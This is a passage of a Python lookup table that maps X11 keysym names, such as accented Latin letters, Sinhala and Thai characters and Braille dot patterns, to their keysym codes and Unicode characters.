'Ocircumflextilde': (0x1001ed6, u'\u1ED6'),
'Odiaeresis': (0x00d6, u'\u00D6'),
'Odoubleacute': (0x01d5, u'\u0150'),
'Ograve': (0x00d2, u'\u00D2'),
'Ohook': (0x1001ece, u'\u1ECE'),
'Ohorn': (0x10001a0, u'\u01A0'),
'Ohornacute': (0x1001eda, u'\u1EDA'),
'Ohornbelowdot': (0x1001ee2, u'\u1EE2'),
'Ohorngrave': (0x1001edc, u'\u1EDC'),
'Ohornhook': (0x1001ede, u'\u1EDE'),
'Ohorntilde': (0x1001ee0, u'\u1EE0'),
'Omacron': (0x03d2, u'\u014C'),
'Ooblique': (0x00d8, u'\u00D8'),
'Oslash': (0x00d8, u'\u00D8'),
'Otilde': (0x00d5, u'\u00D5'),
'P': (0x0050, u'\u0050'),
'Pabovedot': (0x1001e56, u'\u1E56'),
'PesetaSign': (0x10020a7, u'\u20A7'),
'Q': (0x0051, u'\u0051'),
'R': (0x0052, u'\u0052'),
'Racute': (0x01c0, u'\u0154'),
'Rcaron': (0x01d8, u'\u0158'),
'Rcedilla': (0x03a3, u'\u0156'),
'RupeeSign': (0x10020a8, u'\u20A8'),
'S': (0x0053, u'\u0053'),
'SCHWA': (0x100018f, u'\u018F'),
'Sabovedot': (0x1001e60, u'\u1E60'),
'Sacute': (0x01a6, u'\u015A'),
'Scaron': (0x01a9, u'\u0160'),
'Scedilla': (0x01aa, u'\u015E'),
'Scircumflex': (0x02de, u'\u015C'),
'Serbian_DJE': (0x06b1, u'\u0402'),
'Serbian_TSHE': (0x06bb, u'\u040B'),
'Serbian_dje': (0x06a1, u'\u0452'),
'Serbian_tshe': (0x06ab, u'\u045B'),
'Sinh_a': (0x1000d85, u'\u0D85'),
'Sinh_aa': (0x1000d86, u'\u0D86'),
'Sinh_aa2': (0x1000dcf, u'\u0DCF'),
'Sinh_ae': (0x1000d87, u'\u0D87'),
'Sinh_ae2': (0x1000dd0, u'\u0DD0'),
'Sinh_aee': (0x1000d88, u'\u0D88'),
'Sinh_aee2': (0x1000dd1, u'\u0DD1'),
'Sinh_ai': (0x1000d93, u'\u0D93'),
'Sinh_ai2': (0x1000ddb, u'\u0DDB'),
'Sinh_al': (0x1000dca, u'\u0DCA'),
'Sinh_au': (0x1000d96, u'\u0D96'),
'Sinh_au2': (0x1000dde, u'\u0DDE'),
'Sinh_ba': (0x1000db6, u'\u0DB6'),
'Sinh_bha': (0x1000db7, u'\u0DB7'),
'Sinh_ca': (0x1000da0, u'\u0DA0'),
'Sinh_cha': (0x1000da1, u'\u0DA1'),
'Sinh_dda': (0x1000da9, u'\u0DA9'),
'Sinh_ddha': (0x1000daa, u'\u0DAA'),
'Sinh_dha': (0x1000daf, u'\u0DAF'),
'Sinh_dhha': (0x1000db0, u'\u0DB0'),
'Sinh_e': (0x1000d91, u'\u0D91'),
'Sinh_e2': (0x1000dd9, u'\u0DD9'),
'Sinh_ee': (0x1000d92, u'\u0D92'),
'Sinh_ee2': (0x1000dda, u'\u0DDA'),
'Sinh_fa': (0x1000dc6, u'\u0DC6'),
'Sinh_ga': (0x1000d9c, u'\u0D9C'),
'Sinh_gha': (0x1000d9d, u'\u0D9D'),
'Sinh_h2': (0x1000d83, u'\u0D83'),
'Sinh_ha': (0x1000dc4, u'\u0DC4'),
'Sinh_i': (0x1000d89, u'\u0D89'),
'Sinh_i2': (0x1000dd2, u'\u0DD2'),
'Sinh_ii': (0x1000d8a, u'\u0D8A'),
'Sinh_ii2': (0x1000dd3, u'\u0DD3'),
'Sinh_ja': (0x1000da2, u'\u0DA2'),
'Sinh_jha': (0x1000da3, u'\u0DA3'),
'Sinh_jnya': (0x1000da5, u'\u0DA5'),
'Sinh_ka': (0x1000d9a, u'\u0D9A'),
'Sinh_kha': (0x1000d9b, u'\u0D9B'),
'Sinh_kunddaliya': (0x1000df4, u'\u0DF4'),
'Sinh_la': (0x1000dbd, u'\u0DBD'),
'Sinh_lla': (0x1000dc5, u'\u0DC5'),
'Sinh_lu': (0x1000d8f, u'\u0D8F'),
'Sinh_lu2': (0x1000ddf, u'\u0DDF'),
'Sinh_luu': (0x1000d90, u'\u0D90'),
'Sinh_luu2': (0x1000df3, u'\u0DF3'),
'Sinh_ma': (0x1000db8, u'\u0DB8'),
'Sinh_mba': (0x1000db9, u'\u0DB9'),
'Sinh_na': (0x1000db1, u'\u0DB1'),
'Sinh_ndda': (0x1000dac, u'\u0DAC'),
'Sinh_ndha': (0x1000db3, u'\u0DB3'),
'Sinh_ng': (0x1000d82, u'\u0D82'),
'Sinh_ng2': (0x1000d9e, u'\u0D9E'),
'Sinh_nga': (0x1000d9f, u'\u0D9F'),
'Sinh_nja': (0x1000da6, u'\u0DA6'),
'Sinh_nna': (0x1000dab, u'\u0DAB'),
'Sinh_nya': (0x1000da4, u'\u0DA4'),
'Sinh_o': (0x1000d94, u'\u0D94'),
'Sinh_o2': (0x1000ddc, u'\u0DDC'),
'Sinh_oo': (0x1000d95, u'\u0D95'),
'Sinh_oo2': (0x1000ddd, u'\u0DDD'),
'Sinh_pa': (0x1000db4, u'\u0DB4'),
'Sinh_pha': (0x1000db5, u'\u0DB5'),
'Sinh_ra': (0x1000dbb, u'\u0DBB'),
'Sinh_ri': (0x1000d8d, u'\u0D8D'),
'Sinh_rii': (0x1000d8e, u'\u0D8E'),
'Sinh_ru2': (0x1000dd8, u'\u0DD8'),
'Sinh_ruu2': (0x1000df2, u'\u0DF2'),
'Sinh_sa': (0x1000dc3, u'\u0DC3'),
'Sinh_sha': (0x1000dc1, u'\u0DC1'),
'Sinh_ssha': (0x1000dc2, u'\u0DC2'),
'Sinh_tha': (0x1000dad, u'\u0DAD'),
'Sinh_thha': (0x1000dae, u'\u0DAE'),
'Sinh_tta': (0x1000da7, u'\u0DA7'),
'Sinh_ttha': (0x1000da8, u'\u0DA8'),
'Sinh_u': (0x1000d8b, u'\u0D8B'),
'Sinh_u2': (0x1000dd4, u'\u0DD4'),
'Sinh_uu': (0x1000d8c, u'\u0D8C'),
'Sinh_uu2': (0x1000dd6, u'\u0DD6'),
'Sinh_va': (0x1000dc0, u'\u0DC0'),
'Sinh_ya': (0x1000dba, u'\u0DBA'),
'T': (0x0054, u'\u0054'),
'THORN': (0x00de, u'\u00DE'),
'Tabovedot': (0x1001e6a, u'\u1E6A'),
'Tcaron': (0x01ab, u'\u0164'),
'Tcedilla': (0x01de, u'\u0162'),
'Thai_baht': (0x0ddf, u'\u0E3F'),
'Thai_bobaimai': (0x0dba, u'\u0E1A'),
'Thai_chochan': (0x0da8, u'\u0E08'),
'Thai_chochang': (0x0daa, u'\u0E0A'),
'Thai_choching': (0x0da9, u'\u0E09'),
'Thai_chochoe': (0x0dac, u'\u0E0C'),
'Thai_dochada': (0x0dae, u'\u0E0E'),
'Thai_dodek': (0x0db4, u'\u0E14'),
'Thai_fofa': (0x0dbd, u'\u0E1D'),
'Thai_fofan': (0x0dbf, u'\u0E1F'),
'Thai_hohip': (0x0dcb, u'\u0E2B'),
'Thai_honokhuk': (0x0dce, u'\u0E2E'),
'Thai_khokhai': (0x0da2, u'\u0E02'),
'Thai_khokhon': (0x0da5, u'\u0E05'),
'Thai_khokhuat': (0x0da3, u'\u0E03'),
'Thai_khokhwai': (0x0da4, u'\u0E04'),
'Thai_khorakhang': (0x0da6, u'\u0E06'),
'Thai_kokai': (0x0da1, u'\u0E01'),
'Thai_lakkhangyao': (0x0de5, u'\u0E45'),
'Thai_lekchet': (0x0df7, u'\u0E57'),
'Thai_lekha': (0x0df5, u'\u0E55'),
'Thai_lekhok': (0x0df6, u'\u0E56'),
'Thai_lekkao': (0x0df9, u'\u0E59'),
'Thai_leknung': (0x0df1, u'\u0E51'),
'Thai_lekpaet': (0x0df8, u'\u0E58'),
'Thai_leksam': (0x0df3, u'\u0E53'),
'Thai_leksi': (0x0df4, u'\u0E54'),
'Thai_leksong': (0x0df2, u'\u0E52'),
'Thai_leksun': (0x0df0, u'\u0E50'),
'Thai_lochula': (0x0dcc, u'\u0E2C'),
'Thai_loling': (0x0dc5, u'\u0E25'),
'Thai_lu': (0x0dc6, u'\u0E26'),
'Thai_maichattawa': (0x0deb, u'\u0E4B'),
'Thai_maiek': (0x0de8, u'\u0E48'),
'Thai_maihanakat': (0x0dd1, u'\u0E31'),
'Thai_maitaikhu': (0x0de7, u'\u0E47'),
'Thai_maitho': (0x0de9, u'\u0E49'),
'Thai_maitri': (0x0dea, u'\u0E4A'),
'Thai_maiyamok': (0x0de6, u'\u0E46'),
'Thai_moma': (0x0dc1, u'\u0E21'),
'Thai_ngongu': (0x0da7, u'\u0E07'),
'Thai_nikhahit': (0x0ded, u'\u0E4D'),
'Thai_nonen': (0x0db3, u'\u0E13'),
'Thai_nonu': (0x0db9, u'\u0E19'),
'Thai_oang': (0x0dcd, u'\u0E2D'),
'Thai_paiyannoi': (0x0dcf, u'\u0E2F'),
'Thai_phinthu': (0x0dda, u'\u0E3A'),
'Thai_phophan': (0x0dbe, u'\u0E1E'),
'Thai_phophung': (0x0dbc, u'\u0E1C'),
'Thai_phosamphao': (0x0dc0, u'\u0E20'),
'Thai_popla': (0x0dbb, u'\u0E1B'),
'Thai_rorua': (0x0dc3, u'\u0E23'),
'Thai_ru': (0x0dc4, u'\u0E24'),
'Thai_saraa': (0x0dd0, u'\u0E30'),
'Thai_saraaa': (0x0dd2, u'\u0E32'),
'Thai_saraae': (0x0de1, u'\u0E41'),
'Thai_saraaimaimalai': (0x0de4, u'\u0E44'),
'Thai_saraaimaimuan': (0x0de3, u'\u0E43'),
'Thai_saraam': (0x0dd3, u'\u0E33'),
'Thai_sarae': (0x0de0, u'\u0E40'),
'Thai_sarai': (0x0dd4, u'\u0E34'),
'Thai_saraii': (0x0dd5, u'\u0E35'),
'Thai_sarao': (0x0de2, u'\u0E42'),
'Thai_sarau': (0x0dd8, u'\u0E38'),
'Thai_saraue': (0x0dd6, u'\u0E36'),
'Thai_sarauee': (0x0dd7, u'\u0E37'),
'Thai_sarauu': (0x0dd9, u'\u0E39'),
'Thai_sorusi': (0x0dc9, u'\u0E29'),
'Thai_sosala': (0x0dc8, u'\u0E28'),
'Thai_soso': (0x0dab, u'\u0E0B'),
'Thai_sosua': (0x0dca, u'\u0E2A'),
'Thai_thanthakhat': (0x0dec, u'\u0E4C'),
'Thai_thonangmontho': (0x0db1, u'\u0E11'),
'Thai_thophuthao': (0x0db2, u'\u0E12'),
'Thai_thothahan': (0x0db7, u'\u0E17'),
'Thai_thothan': (0x0db0, u'\u0E10'),
'Thai_thothong': (0x0db8, u'\u0E18'),
'Thai_thothung': (0x0db6, u'\u0E16'),
'Thai_topatak': (0x0daf, u'\u0E0F'),
'Thai_totao': (0x0db5, u'\u0E15'),
'Thai_wowaen': (0x0dc7, u'\u0E27'),
'Thai_yoyak': (0x0dc2, u'\u0E22'),
'Thai_yoying': (0x0dad, u'\u0E0D'),
'Tslash': (0x03ac, u'\u0166'),
'U': (0x0055, u'\u0055'),
'Uacute': (0x00da, u'\u00DA'),
'Ubelowdot': (0x1001ee4, u'\u1EE4'),
'Ubreve': (0x02dd, u'\u016C'),
'Ucircumflex': (0x00db, u'\u00DB'),
'Udiaeresis': (0x00dc, u'\u00DC'),
'Udoubleacute': (0x01db, u'\u0170'),
'Ugrave': (0x00d9, u'\u00D9'),
'Uhook': (0x1001ee6, u'\u1EE6'),
'Uhorn': (0x10001af, u'\u01AF'),
'Uhornacute': (0x1001ee8, u'\u1EE8'),
'Uhornbelowdot': (0x1001ef0, u'\u1EF0'),
'Uhorngrave': (0x1001eea, u'\u1EEA'),
'Uhornhook': (0x1001eec, u'\u1EEC'),
'Uhorntilde': (0x1001eee, u'\u1EEE'),
'Ukrainian_GHE_WITH_UPTURN': (0x06bd, u'\u0490'),
'Ukrainian_I': (0x06b6, u'\u0406'),
'Ukrainian_IE': (0x06b4, u'\u0404'),
'Ukrainian_YI': (0x06b7, u'\u0407'),
'Ukrainian_ghe_with_upturn': (0x06ad, u'\u0491'),
'Ukrainian_i': (0x06a6, u'\u0456'),
'Ukrainian_ie': (0x06a4, u'\u0454'),
'Ukrainian_yi': (0x06a7, u'\u0457'),
'Umacron': (0x03de, u'\u016A'),
'Uogonek': (0x03d9, u'\u0172'),
'Uring': (0x01d9, u'\u016E'),
'Utilde': (0x03dd, u'\u0168'),
'V': (0x0056, u'\u0056'),
'W': (0x0057, u'\u0057'),
'Wacute': (0x1001e82, u'\u1E82'),
'Wcircumflex': (0x1000174, u'\u0174'),
'Wdiaeresis': (0x1001e84, u'\u1E84'),
'Wgrave': (0x1001e80, u'\u1E80'),
'WonSign': (0x10020a9, u'\u20A9'),
'X': (0x0058, u'\u0058'),
'Xabovedot': (0x1001e8a, u'\u1E8A'),
'Y': (0x0059, u'\u0059'),
'Yacute': (0x00dd, u'\u00DD'),
'Ybelowdot': (0x1001ef4, u'\u1EF4'),
'Ycircumflex': (0x1000176, u'\u0176'),
'Ydiaeresis': (0x13be, u'\u0178'),
'Ygrave': (0x1001ef2, u'\u1EF2'),
'Yhook': (0x1001ef6, u'\u1EF6'),
'Ytilde': (0x1001ef8, u'\u1EF8'),
'Z': (0x005a, u'\u005A'),
'Zabovedot': (0x01af, u'\u017B'),
'Zacute': (0x01ac, u'\u0179'),
'Zcaron': (0x01ae, u'\u017D'),
'Zstroke': (0x10001b5, u'\u01B5'),
'a': (0x0061, u'\u0061'),
'aacute': (0x00e1, u'\u00E1'),
'abelowdot': (0x1001ea1, u'\u1EA1'),
'abovedot': (0x01ff, u'\u02D9'),
'abreve': (0x01e3, u'\u0103'),
'abreveacute': (0x1001eaf, u'\u1EAF'),
'abrevebelowdot': (0x1001eb7, u'\u1EB7'),
'abrevegrave': (0x1001eb1, u'\u1EB1'),
'abrevehook': (0x1001eb3, u'\u1EB3'),
'abrevetilde': (0x1001eb5, u'\u1EB5'),
'acircumflex': (0x00e2, u'\u00E2'),
'acircumflexacute': (0x1001ea5, u'\u1EA5'),
'acircumflexbelowdot': (0x1001ead, u'\u1EAD'),
'acircumflexgrave': (0x1001ea7, u'\u1EA7'),
'acircumflexhook': (0x1001ea9, u'\u1EA9'),
'acircumflextilde': (0x1001eab, u'\u1EAB'),
'acute': (0x00b4, u'\u00B4'),
'adiaeresis': (0x00e4, u'\u00E4'),
'ae': (0x00e6, u'\u00E6'),
'agrave': (0x00e0, u'\u00E0'),
'ahook': (0x1001ea3, u'\u1EA3'),
'amacron': (0x03e0, u'\u0101'),
'ampersand': (0x0026, u'\u0026'),
'aogonek': (0x01b1, u'\u0105'),
'apostrophe': (0x0027, u'\u0027'),
'approxeq': (0x1002248, u'\u2245'),
'approximate': (0x08c8, u'\u223C'),
'aring': (0x00e5, u'\u00E5'),
'asciicircum': (0x005e, u'\u005E'),
'asciitilde': (0x007e, u'\u007E'),
'asterisk': (0x002a, u'\u002A'),
'at': (0x0040, u'\u0040'),
'atilde': (0x00e3, u'\u00E3'),
'b': (0x0062, u'\u0062'),
'babovedot': (0x1001e03, u'\u1E03'),
'backslash': (0x005c, u'\u005C'),
'ballotcross': (0x0af4, u'\u2717'),
'bar': (0x007c, u'\u007C'),
'because': (0x1002235, u'\u2235'),
'botintegral': (0x08a5, u'\u2321'),
'botleftparens': (0x08ac, u'\u239D'),
'botleftsqbracket': (0x08a8, u'\u23A3'),
'botrightparens': (0x08ae, u'\u23A0'),
'botrightsqbracket': (0x08aa, u'\u23A6'),
'bott': (0x09f6, u'\u2534'),
'braceleft': (0x007b, u'\u007B'),
'braceright': (0x007d, u'\u007D'),
'bracketleft': (0x005b, u'\u005B'),
'bracketright': (0x005d, u'\u005D'),
'braille_blank': (0x1002800, u'\u2800'),
'braille_dots_1': (0x1002801, u'\u2801'),
'braille_dots_12': (0x1002803, u'\u2803'),
'braille_dots_123': (0x1002807, u'\u2807'),
'braille_dots_1234': (0x100280f, u'\u280f'),
'braille_dots_12345': (0x100281f, u'\u281f'),
'braille_dots_123456': (0x100283f, u'\u283f'),
'braille_dots_1234567': (0x100287f, u'\u287f'),
'braille_dots_12345678': (0x10028ff, u'\u28ff'),
'braille_dots_1234568': (0x10028bf, u'\u28bf'),
'braille_dots_123457': (0x100285f, u'\u285f'),
'braille_dots_1234578': (0x10028df, u'\u28df'),
'braille_dots_123458': (0x100289f, u'\u289f'),
'braille_dots_12346': (0x100282f, u'\u282f'),
'braille_dots_123467': (0x100286f, u'\u286f'),
'braille_dots_1234678': (0x10028ef, u'\u28ef'),
'braille_dots_123468': (0x10028af, u'\u28af'),
'braille_dots_12347': (0x100284f, u'\u284f'),
'braille_dots_123478': (0x10028cf, u'\u28cf'),
'braille_dots_12348': (0x100288f, u'\u288f'),
'braille_dots_1235': (0x1002817, u'\u2817'),
'braille_dots_12356': (0x1002837, u'\u2837'),
'braille_dots_123567': (0x1002877, u'\u2877'),
'braille_dots_1235678': (0x10028f7, u'\u28f7'),
'braille_dots_123568': (0x10028b7, u'\u28b7'),
'braille_dots_12357': (0x1002857, u'\u2857'),
'braille_dots_123578': (0x10028d7, u'\u28d7'),
'braille_dots_12358': (0x1002897, u'\u2897'),
'braille_dots_1236': (0x1002827, u'\u2827'),
'braille_dots_12367': (0x1002867, u'\u2867'),
'braille_dots_123678': (0x10028e7, u'\u28e7'),
'braille_dots_12368': (0x10028a7, u'\u28a7'),
'braille_dots_1237': (0x1002847, u'\u2847'),
'braille_dots_12378': (0x10028c7, u'\u28c7'),
'braille_dots_1238': (0x1002887, u'\u2887'),
'braille_dots_124': (0x100280b, u'\u280b'),
'braille_dots_1245': (0x100281b, u'\u281b'),
'braille_dots_12456': (0x100283b, u'\u283b'),
'braille_dots_124567': (0x100287b, u'\u287b'),
'braille_dots_1245678': (0x10028fb, u'\u28fb'),
'braille_dots_124568': (0x10028bb, u'\u28bb'),
'braille_dots_12457': (0x100285b, u'\u285b'),
'braille_dots_124578': (0x10028db, u'\u28db'),
'braille_dots_12458': (0x100289b, u'\u289b'),
'braille_dots_1246': (0x100282b, u'\u282b'),
'braille_dots_12467': (0x100286b, u'\u286b'),
'braille_dots_124678': (0x10028eb, u'\u28eb'),
'braille_dots_12468': (0x10028ab, u'\u28ab'),
'braille_dots_1247': (0x100284b, u'\u284b'),
'braille_dots_12478': (0x10028cb, u'\u28cb'),
'braille_dots_1248': (0x100288b, u'\u288b'),
'braille_dots_125': (0x1002813, u'\u2813'),
'braille_dots_1256': (0x1002833, u'\u2833'),
'braille_dots_12567': (0x1002873, u'\u2873'),
'braille_dots_125678': (0x10028f3, u'\u28f3'),
'braille_dots_12568': (0x10028b3, u'\u28b3'),
'braille_dots_1257': (0x1002853, u'\u2853'),
'braille_dots_12578': (0x10028d3, u'\u28d3'),
'braille_dots_1258': (0x1002893, u'\u2893'),
'braille_dots_126': (0x1002823, u'\u2823'),
'braille_dots_1267': (0x1002863, u'\u2863'),
'braille_dots_12678': (0x10028e3, u'\u28e3'),
'braille_dots_1268': (0x10028a3, u'\u28a3'),
'braille_dots_127': (0x1002843, u'\u2843'),
'braille_dots_1278': (0x10028c3, u'\u28c3'),
'braille_dots_128': (0x1002883, u'\u2883'),
'braille_dots_13': (0x1002805, u'\u2805'),
'braille_dots_134': (0x100280d, u'\u280d'),
'braille_dots_1345': (0x100281d, u'\u281d'),
'braille_dots_13456': (0x100283d, u'\u283d'),
'braille_dots_134567': (0x100287d, u'\u287d'),
'braille_dots_1345678': (0x10028fd, u'\u28fd'),
'braille_dots_134568': (0x10028bd, u'\u28bd'),
'braille_dots_13457': (0x100285d, u'\u285d'),
'braille_dots_134578': (0x10028dd, u'\u28dd'),
'braille_dots_13458': (0x100289d, u'\u289d'),
'braille_dots_1346': (0x100282d, u'\u282d'),
'braille_dots_13467': (0x100286d, u'\u286d'),
'braille_dots_134678': (0x10028ed, u'\u28ed'),
'braille_dots_13468': (0x10028ad, u'\u28ad'),
'braille_dots_1347': (0x100284d, u'\u284d'),
'braille_dots_13478': (0x10028cd, u'\u28cd'),
'braille_dots_1348': (0x100288d, u'\u288d'),
'braille_dots_135': (0x1002815, u'\u2815'),
'braille_dots_1356': (0x1002835, u'\u2835'),
'braille_dots_13567': (0x1002875, u'\u2875'),
'braille_dots_135678': (0x10028f5, u'\u28f5'),
'braille_dots_13568': (0x10028b5, u'\u28b5'),
'braille_dots_1357': (0x1002855, u'\u2855'),
'braille_dots_13578': (0x10028d5, u'\u28d5'),
'braille_dots_1358': (0x1002895, u'\u2895'),
'braille_dots_136': (0x1002825, u'\u2825'),
'braille_dots_1367': (0x1002865, u'\u2865'),
'braille_dots_13678': (0x10028e5, u'\u28e5'),
'braille_dots_1368': (0x10028a5, u'\u28a5'),
'braille_dots_137': (0x1002845, u'\u2845'),
'braille_dots_1378': (0x10028c5, u'\u28c5'),
'braille_dots_138': (0x1002885, u'\u2885'),
'braille_dots_14': (0x1002809, u'\u2809'),
'braille_dots_145': (0x1002819, u'\u2819'),
'braille_dots_1456': (0x1002839, u'\u2839'),
'braille_dots_14567': (0x1002879, u'\u2879'),
'braille_dots_145678': (0x10028f9, u'\u28f9'),
'braille_dots_14568': (0x10028b9, u'\u28b9'),
'braille_dots_1457': (0x1002859, u'\u2859'),
'braille_dots_14578': (0x10028d9, u'\u28d9'),
'braille_dots_1458': (0x1002899, u'\u2899'),
'braille_dots_146': (0x1002829, u'\u2829'),
'braille_dots_1467': (0x1002869, u'\u2869'),
'braille_dots_14678': (0x10028e9, u'\u28e9'),
'braille_dots_1468': (0x10028a9, u'\u28a9'),
'braille_dots_147': (0x1002849, u'\u2849'),
'braille_dots_1478': (0x10028c9, u'\u28c9'),
'braille_dots_148': (0x1002889, u'\u2889'),
'braille_dots_15': (0x1002811, u'\u2811'),
'braille_dots_156': (0x1002831, u'\u2831'),
'braille_dots_1567': (0x1002871, u'\u2871'),
'braille_dots_15678': (0x10028f1, u'\u28f1'),
'braille_dots_1568': (0x10028b1, u'\u28b1'),
'braille_dots_157': (0x1002851, u'\u2851'),
'braille_dots_1578': (0x10028d1, u'\u28d1'),
'braille_dots_158': (0x1002891, u'\u2891'),
'braille_dots_16': (0x1002821, u'\u2821'),
'braille_dots_167': (0x1002861, u'\u2861'),
'braille_dots_1678': (0x10028e1, u'\u28e1'),
'braille_dots_168': (0x10028a1, u'\u28a1'),
'braille_dots_17': (0x1002841, u'\u2841'),
'braille_dots_178': (0x10028c1, u'\u28c1'),
'braille_dots_18': (0x1002881, u'\u2881'),
'braille_dots_2': (0x1002802, u'\u2802'),
'braille_dots_23': (0x1002806, u'\u2806'),
'braille_dots_234': (0x100280e, u'\u280e'),
'braille_dots_2345': (0x100281e, u'\u281e'),
'braille_dots_23456': (0x100283e, u'\u283e'),
'braille_dots_234567': (0x100287e, u'\u287e'),
'braille_dots_2345678': (0x10028fe, u'\u28fe'),
'braille_dots_234568': (0x10028be, u'\u28be'),
'braille_dots_23457': (0x100285e, u'\u285e'),
'braille_dots_234578': (0x10028de, u'\u28de'),
'braille_dots_23458': (0x100289e, u'\u289e'),
'braille_dots_2346': (0x100282e, u'\u282e'),
'braille_dots_23467': (0x100286e, u'\u286e'),
'braille_dots_234678': (0x10028ee, u'\u28ee'),
'braille_dots_23468': (0x10028ae, u'\u28ae'),
'braille_dots_2347': (0x100284e, u'\u284e'),
'braille_dots_23478': (0x10028ce, u'\u28ce'),
'braille_dots_2348': (0x100288e, u'\u288e'),
'braille_dots_235': (0x1002816, u'\u2816'),
'braille_dots_2356': (0x1002836, u'\u2836'),
'braille_dots_23567': (0x1002876, u'\u2876'),
'braille_dots_235678': (0x10028f6, u'\u28f6'),
'braille_dots_23568': (0x10028b6, u'\u28b6'),
'braille_dots_2357': (0x1002856, u'\u2856'),
'braille_dots_23578': (0x10028d6, u'\u28d6'),
'braille_dots_2358': (0x1002896, u'\u2896'),
'braille_dots_236': (0x1002826, u'\u2826'),
'braille_dots_2367': (0x1002866, u'\u2866'),
'braille_dots_23678': (0x10028e6, u'\u28e6'),
'braille_dots_2368': (0x10028a6, u'\u28a6'),
'braille_dots_237': (0x1002846, u'\u2846'),
'braille_dots_2378': (0x10028c6, u'\u28c6'),
'braille_dots_238': (0x1002886, u'\u2886'),
'braille_dots_24': (0x100280a, u'\u280a'),
'braille_dots_245': (0x100281a, u'\u281a'),
'braille_dots_2456': (0x100283a, u'\u283a'),
'braille_dots_24567': (0x100287a, u'\u287a'),
'braille_dots_245678': (0x10028fa, u'\u28fa'),
'braille_dots_24568': (0x10028ba, u'\u28ba'),
'braille_dots_2457': (0x100285a, u'\u285a'),
'braille_dots_24578': (0x10028da, u'\u28da'),
'braille_dots_2458': (0x100289a, u'\u289a'),
'braille_dots_246': (0x100282a, u'\u282a'),
'braille_dots_2467': (0x100286a, u'\u286a'),
'braille_dots_24678': (0x10028ea, u'\u28ea'),
'braille_dots_2468': (0x10028aa, u'\u28aa'),
'braille_dots_247': (0x100284a, u'\u284a'),
'braille_dots_2478': (0x10028ca, u'\u28ca'),
'braille_dots_248': (0x100288a, u'\u288a'),
'braille_dots_25': (0x1002812, u'\u2812'),
'braille_dots_256': (0x1002832, u'\u2832'),
'braille_dots_2567': (0x1002872, u'\u2872'),
'braille_dots_25678': (0x10028f2, u'\u28f2'),
'braille_dots_2568': (0x10028b2, u'\u28b2'),
'braille_dots_257': (0x1002852, u'\u2852'),
'braille_dots_2578': (0x10028d2, u'\u28d2'),
'braille_dots_258': (0x1002892, u'\u2892'),
'braille_dots_26': (0x1002822, u'\u2822'),
'braille_dots_267': (0x1002862, u'\u2862'),
'braille_dots_2678': (0x10028e2, u'\u28e2'),
'braille_dots_268': (0x10028a2, u'\u28a2'),
'braille_dots_27': (0x1002842, u'\u2842'),
'braille_dots_278': (0x10028c2, u'\u28c2'),
'braille_dots_28': (0x1002882, u'\u2882'),
'braille_dots_3': (0x1002804, u'\u2804'),
'braille_dots_34': (0x100280c, u'\u280c'),
'braille_dots_345': (0x100281c, u'\u281c'),
'braille_dots_3456': (0x100283c, u'\u283c'),
'braille_dots_34567': (0x100287c, u'\u287c'),
'braille_dots_345678': (0x10028fc, u'\u28fc'),
'braille_dots_34568': (0x10028bc, u'\u28bc'),
'braille_dots_3457': (0x100285c, u'\u285c'),
'braille_dots_34578': (0x10028dc, u'\u28dc'),
'braille_dots_3458': (0x100289c, u'\u289c'),
'braille_dots_346': (0x100282c, u'\u282c'),
'braille_dots_3467': (0x100286c, u'\u286c'),
'braille_dots_34678': (0x10028ec, u'\u28ec'),
'braille_dots_3468': (0x10028ac, u'\u28ac'),
'braille_dots_347': (0x100284c, u'\u284c'),
'braille_dots_3478': (0x10028cc, u'\u28cc'),
'braille_dots_348': (0x100288c, u'\u288c'),
'braille_dots_35': (0x1002814, u'\u2814'),
'braille_dots_356': (0x1002834, u'\u2834'),
'braille_dots_3567': (0x1002874, u'\u2874'),
'braille_dots_35678': (0x10028f4, u'\u28f4'),
'braille_dots_3568': (0x10028b4, u'\u28b4'),
'braille_dots_357': (0x1002854, u'\u2854'),
'braille_dots_3578': (0x10028d4, u'\u28d4'),
'braille_dots_358': (0x1002894, u'\u2894'),
'braille_dots_36': (0x1002824, u'\u2824'),
'braille_dots_367': (0x1002864, u'\u2864'),
'braille_dots_3678': (0x10028e4, u'\u28e4'),
'braille_dots_368': (0x10028a4, u'\u28a4'),
'braille_dots_37': (0x1002844, u'\u2844'),
'braille_dots_378': (0x10028c4, u'\u28c4'),
'braille_dots_38': (0x1002884, u'\u2884'),
'braille_dots_4': (0x1002808, u'\u2808'),
'braille_dots_45': (0x1002818, u'\u2818'),
'braille_dots_456': (0x1002838, u'\u2838'),
'braille_dots_4567': (0x1002878, u'\u2878'),
'braille_dots_45678': (0x10028f8, u'\u28f8'),
'braille_dots_4568': (0x10028b8, u'\u28b8'),
'braille_dots_457': (0x1002858, u'\u2858'),
'braille_dots_4578': (0x10028d8, u'\u28d8'),
'braille_dots_458': (0x1002898, u'\u2898'),
'braille_dots_46': (0x1002828, u'\u2828'),
'braille_dots_467': (0x1002868, u'\u2868'),
'braille_dots_4678': (0x10028e8, u'\u28e8'),
'braille_dots_468': (0x10028a8, u'\u28a8'),
'braille_dots_47': (0x1002848, u'\u2848'),
'braille_dots_478': (0x10028c8, u'\u28c8'),
'braille_dots_48': (0x1002888, u'\u2888'),
'braille_dots_5': (0x1002810, u'\u2810'),
'braille_dots_56': (0x1002830, u'\u2830'),
'braille_dots_567': (0x1002870, u'\u2870'),
'braille_dots_5678': (0x10028f0, u'\u28f0'),
'braille_dots_568': (0x10028b0, u'\u28b0'),
'braille_dots_57': (0x1002850, u'\u2850'),
'braille_dots_578': (0x10028d0, u'\u28d0'),
'braille_dots_58': (0x1002890, u'\u2890'),
'braille_dots_6': (0x1002820, u'\u2820'),
'braille_dots_67': (0x1002860, u'\u2860'),
'braille_dots_678': (0x10028e0, u'\u28e0'),
'braille_dots_68': (0x10028a0, u'\u28a0'),
'braille_dots_7': (0x1002840, u'\u2840'),
'braille_dots_78': (0x10028c0, u'\u28c0'),
'braille_dots_8': (0x1002880, u'\u2880'),
'breve': (0x01a2, u'\u02D8'),
'brokenbar': (0x00a6, u'\u00A6'),
'c': (0x0063, u'\u0063'),
'cabovedot': (0x02e5, u'\u010B'),
'cacute': (0x01e6, u'\u0107'),
'careof': (0x0ab8, u'\u2105'),
'caret': (0x0afc, u'\u2038'),
'caron': (0x01b7, u'\u02C7'),
'ccaron': (0x01e8, u'\u010D'),
'ccedilla': (0x00e7, u'\u00E7'),
'ccircumflex': (0x02e6, u'\u0109'),
'cedilla': (0x00b8, u'\u00B8'),
'cent': (0x00a2, u'\u00A2'),
'checkerboard': (0x09e1, u'\u2592'),
'checkmark': (0x0af3, u'\u2713'),
'circle': (0x0bcf, u'\u25CB'),
